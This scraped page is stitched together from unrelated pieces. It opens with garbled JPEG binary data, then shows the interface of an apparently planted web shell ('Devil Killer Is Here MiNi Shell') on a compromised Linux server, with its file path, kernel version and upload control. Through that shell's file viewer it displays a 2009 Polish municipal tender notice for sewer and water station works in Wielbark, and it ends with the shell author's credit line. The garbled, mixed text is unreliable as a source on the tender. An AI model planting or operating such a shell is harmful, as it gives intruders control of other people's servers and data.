JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090706/223878-N-2009.html

<p class="kh_header"><b>Wielbark: Budowa kanalizacji - etap II wraz z modernizacją Stacji Uzdatniania Wody w Wielbarku</b><br>
<b>Numer ogłoszenia: 223878 - 2009; data zamieszczenia: 06.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielbark , ul. Grunwaldzka 2, 12-160 Wielbark, woj. warmińsko-mazurskie, tel. 089 6218106, faks 089 6218106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielbark.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji - etap II wraz z modernizacją Stacji Uzdatniania Wody w Wielbarku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Podciśnieniową kanalizację sanitarną - etap II.
Zakres rzeczowy podciśnieniowej kanalizacji sanitarnej obejmuje zlewnie B-1 i  B-2, w tym:
- zbiorcze i podłączeniowe rurociągi podciśnieniowe;
- Sieć kanalizacji sanitarnej i przyłączy kanalizacyjnych grawitacyjnych;
- rozbudowę podciśnieniowej pompowni ścieków;

1.Długość rurociągów kanalizacji podciśnieniowej:
1. zbiorcze rurociągi PE 225			- 1 389 m;
2.zbiorcze rurociągi PE 160			- 2 486 m;
3. zbiorcze i podłączeniowe rurociągi PE 110	- 3 671 m; 
				RAZEM:          - 9 879 M.

2. Kanalizacja i przyłącza kanalizacyjne grawitacyjne.
 Ilość urządzeń kanalizacyjnych:
1. kanalizacja sanitarna grawitacyjna				- 1 747 m
2. podłączenie wewnętrznych instalacji kanalizacyjnych		- 789 m
3. ilość budynków podłączonych do kanalizacji			- 159 szt.

3. Podciśnieniowa pompownia ścieków.
Zrealizowana w 2003 roku w Wielbarku podciśnieniowa pompownia ścieków w zakresie dostosowania w części dla całej inwestycji, a w części dla I zrealizowanego etapu.
Zakres rzeczowy  obejmuje wykonanie:
1. zbiornika podciśnieniowego o pojemności 18 m3 z pompa przetłaczającą ścieki do oczyszczalni ścieków;
2. rurociągów technologicznych łączących zbiornik z rurociągami istniejącymi i projektowanymi pompowni i kanalizacji podciśnieniowej;
3. armatury  sygnalizacyjnej, sterującej i zasuw odcinających;
Ogrodzenia zbiorników wykonanych za rzeką Sawica i uzupełnienie ogrodzenia pompowni podciśnieniowej;
4. uzupełnienie AKPiA.

4. Skrzyżowanie kanalizacji z drogami, torami kolejowymi i uzbrojeniem terenu.
1. droga krajowa Nr 57 Szczytno - Przasnysz -   przejścia wykonane przeciskiem;
2. Droga powiatowa,  PKP i droga gminna - przejścia wykonane przeciskiem;
3. Tor kolejowy relacji Ostrołęka Szczytno i relacji Nidzica Wielbark - przejście wykonane przeciskiem;
4. Rów - przy skrzyżowaniu z rowem w sąsiedztwie zabudowań fermy w Wielbarku - rurociąg w rurze osłonowej;
5. Kable energetyczne, telekomunikacyjne, przyłącza wodociągowe - zabezpieczać osłonami rurowymi;

5. Stacja uzdatniania wody - SUW WIELBARK
Do wykonania jest:
1.  budowa budynku SUW wyposażonego w urządzenia do uzdatniania wody i jej tłoczenia do sieci wodociągowej o wydajności 190 m3/h;
Budynek SUW: -  pow. zabudowy  - 198,0 m2; pow. użytkowa -  167,1 m2; kubatura- 830,0 m3;
2. budowa dwóch zbiorników stalowych wody czystej o 0 4800 mm, wysokości h=10,50 m o pojemności łącznej 343,6 m3.;
3. Budowa przewodów tłocznych pomiędzy studzienkami i zbiornikami wody czystej w rur PE;
4. budowa przewodów wodociągowych z rur PVC DN 225 - 280;
5. Budowa kanalizacji sanitarnej i technologicznej z rur PVC 0 0,16 - 0,20 ( z odprowadzeniem do istniejącej kanalizacji wód popłucznych;
6. budowa kabli sygnalizacyjnych i sterowniczych;
7. budowa ogrodzenia działki SUW.

Modernizacja i wykorzystanie istniejących elementów SUW:
1. studni wierconych Nr 1 i Nr 2 o wydajności 145 m3/h,
2. odstojników popłuczyn;
3. odpływu popłuczyn do rzeki Sawicy;
4. Neutralizatora wód podchlorynu sodu;

Oraz rozbiórki:
1. istniejącego budynku SUW z urządzeniami technologicznymi;
2. istniejącego składu opału;
3. istniejącego zbiornika wieżowego o pojemności 300m3;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.10.00.00-8, 45.23.24.10-9, 45.23.21.30-2, 45.23.24.23-3, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 80 000,00 PLN (słownie PLN: osiemdziesiąt tysięcy).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w
Art. 22 ust. 1 i nie podlegają wykluczeniu z postępowania na podstawie Art. 24 ust. 1 i 2 Ustawy t.j.:
1.  posiadają  uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia ( w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnienie warunku wykazują oddzielnie),
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a)	posiadać przeciętne zatrudnienie w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w wysokości minimum 25 pracowników w każdym roku.
b)	posiadać przeciętną liczebność personelu kierowniczego w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w wysokości minimum 4 osoby.
c)	wskazać do wykonania niniejszego zamówienia następujące osoby, właściwe do realizacji określonych czynności, które posiadają określone kwalifikacje, niezbędne do wykonania zamówienia:
- Kierownik robót budowlanych - posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności budowlanej, liczone od momentu uzyskania uprawnień,  w tym uczestniczący w  realizacji Stacji Uzdatniania Wody.

- Kierownik robót sanitarnych - posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności sanitarnej, liczone od momentu uzyskania uprawnień, w tym uczestniczący w realizacji kanalizacji sanitarnej.

-  Kierownik Robót Elektrycznych -  posiadający uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależący do Okręgowej Izby Inżynierów Budownictwa, posiadający co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności elektrycznej,  liczone od momentu uzyskania uprawnień, w tym uczestniczący w  realizacji kanalizacji sanitarnej.

d)   wykonać w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie roboty budowlane, których przedmiotem była budowa sieci kanalizacji sanitarnej , każda o wartości równej co najmniej 2 000 000 PLN brutto.

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia, Wykonawca musi spełniać następujące warunki: (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa): 
a)	średnie roczne obroty wykonawcy w robotach budowlanych w ostatnich 3 latach powinny wynosić co najmniej 3 000 000 PLN.
b)	posiadać środki finansowe w wysokości co najmniej 600 000 PLN,  lub posiadać zdolność kredytową w wysokości co najmniej 600 000 PLN.
c)	posiadać ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej na wartość nie niższą niż 2.000.000 PLN.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie dokumentów i oświadczeń załączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca winien złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w Art. 22 ust. 1 Ustawy wg załączonego do IDW wzoru - Załącznik nr 3.
2.	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie Art. 24 ust. 1 i 2 Ustawy, Wykonawca musi załączyć do oferty wymagane niżej dokumenty (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia  muszą być złożone przedmiotowe dokumenty dla każdego z nich):
i.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, który potwierdza prawo Wykonawcy do występowania w obrocie prawnym oraz wskazuje osobę/osoby upoważnione do reprezentacji Wykonawcy. W przypadku, gdy nie wszystkie powyższe informacje znajdują się w dokumencie rejestrowym należy również załączyć inne dokumenty prezentujące powyższe dane np. statut, umowę spółki itp. Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonych dokumentów, do oferty należy dołączyć także pełnomocnictwo w oryginale lub uwierzytelnioną notarialnie kopię.
ii.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w Art. 24 ust. 1 pkt 4-8 Ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
iii.	 aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w Art. 24 ust. 1 pkt 9 Ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
iv.	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

3.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawca musi załączyć do oferty wymagane niżej dokumenty (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia niżej wymienione dokumenty mogą być złożone wspólnie): 
i.	informację przedstawiającą przeciętną ilość zatrudnionych pracowników w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, sporządzoną według wzoru stanowiącego Załącznik nr 4 do niniejszej IDW,
ii.	informację przedstawiającą przeciętną liczebność personelu kierowniczego w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie sporządzoną według wzoru stanowiącego Załącznik nr 5 do niniejszej IDW,
iii.	wykaz osób, które będą wykonywać zamówienie obejmujący co najmniej wskazanie kierownika budowy, kierownika robót sanitarnych i kierownika robót elektrycznych wg wzoru stanowiącego Załącznik nr 6.
Dla każdej z osób wymienionych w wykazie należy załączyć życiorys zawodowy przygotowany wg wzoru - Załącznik nr 7.
Życiorysy (w oryginale oferty) powinny być własnoręcznie podpisane przez poszczególne osoby. Objętość jednego życiorysu nie powinien przekroczyć 5 stron. Kwalifikacje oraz doświadczenie każdej z osób określone w życiorysie muszą jasno odpowiadać profilowi określonemu w przedmiocie zamówienia.. 
Wszystkie pola załączonego wzoru życiorysu powinny zostać wypełnione.
Ponadto życiorys winien zawierać miejscowość i datę sporządzenia oraz podpis/parafkę osoby podpisującej ofertę w imieniu Wykonawcy.
Dla każdej z osób wymienionych w wykazie należy dołączyć również dokumenty stwierdzające, że osoby te posiadają wymagane uprawnienia, zgodne z polskim Prawem budowlanym. Należy dołączyć kserokopię uprawnień oraz zaświadczeń o przynależności do właściwej izby samorządu zawodowego aktualne na dzień składania ofert.
iv.	wykaz wykonanych w okresie ostatnich pięciu lat, przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - robót budowlanych, których przedmiotem była  budowa sieci kanalizacji sanitarnej, każda o wartości równej co najmniej 2 000 000 PLN brutto), z podaniem ich wartości, dat i miejsca wykonania i odbiorców oraz załączenia dokumentów potwierdzających ( np. referencje ), że roboty te zostały wykonane należycie (Załącznik nr 8).
W przypadku wykazania kontraktów zawartych w walucie innej niż PLN, wartość kontraktu należy przeliczyć na PLN po kursie średnim NBP obowiązującym w dniu podpisania kontraktu (w takim przypadku prosimy o podanie daty podpisania kontraktu). 
4.	W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca musi załączyć do oferty wymagane niżej dokumenty:
i.	rachunek zysków i strat, a w przypadku Wykonawców, którzy nie są zobowiązani do sporządzania sprawozdania finansowego, dokumenty określające obroty - za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
Dodatkowo, Wykonawca powinien załączyć do oferty informację określającą obroty w robotach budowlanych, przygotowaną na podstawie ww. dokumentów na druku załączonym do specyfikacji istotnych warunków zamówienia (Załącznik nr 9). Dane w informacji należy przedstawić w PLN. 
( W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wymagane dokumenty musi złożyć co najmniej jeden podmiot ).
ii.	informację banku, w którym Wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości co najmniej 600 000 PLN, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
( W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane dokumenty musi złożyć co najmniej jeden podmiot ).
iii.	Wykonawca musi złożyć ważną polisę lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na wartość nie niższą niż 2.000.000 PLN. ( W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia,  każdy z wykonawców składa polisę lub inny dokument ubezpieczenia,  potwierdzający ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Łączna kwota ubezpieczenia  nie może być niższa niż 2.000.000 PLN). 
5.	Wymagane w punktach 1 do 4 dokumenty należy przedstawić w formie oryginałów lub kopii  poświadczonej za zgodność z oryginałem przez Wykonawcę ( z zastrzeżeniem p. 2.i)  dotyczącego pełnomocnictwa ) 
6.	Stosownie do treści § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r.  w  sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87, poz. 605):
i.	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 2.i), 2.iii), 2.iv) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
c)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
d)	zamiast dokumentu wymienionego w pkt  2.ii) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą.
ii.	jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w powyższym pkt. 6.i). zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
b.	Dokumenty sporządzone w języku obcym Wykonawca dostarcza wraz z tłumaczeniem na język polski, poświadczone przez Wykonawcę.
c.	Dodatkowo do oferty należy załączyć:
a)	parafowany formularz umowy - dokument ten powinien zostać parafowany na każdej stronie przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia oraz wypełnione dane kontraktowe, stanowiące Załącznik nr 2 do IDW.
b)	kosztorys ofertowy
c)	wstępny harmonogram rzeczowo-finansowy realizacji zadania, który powinien obejmować wykonanie wszystkich zadań określonych SIWZ przy uwzględnieniu wszystkich osób i podmiotów zaangażowanych w realizację zadania w czasie określonym przez Zamawiającego.
d)	pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wielbark.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> -.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2009 godzina 10:00, miejsce: Urząd Gminy Wielbark
Adres: 12-160 Wielbark. Ul. Grunwaldzka 2, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com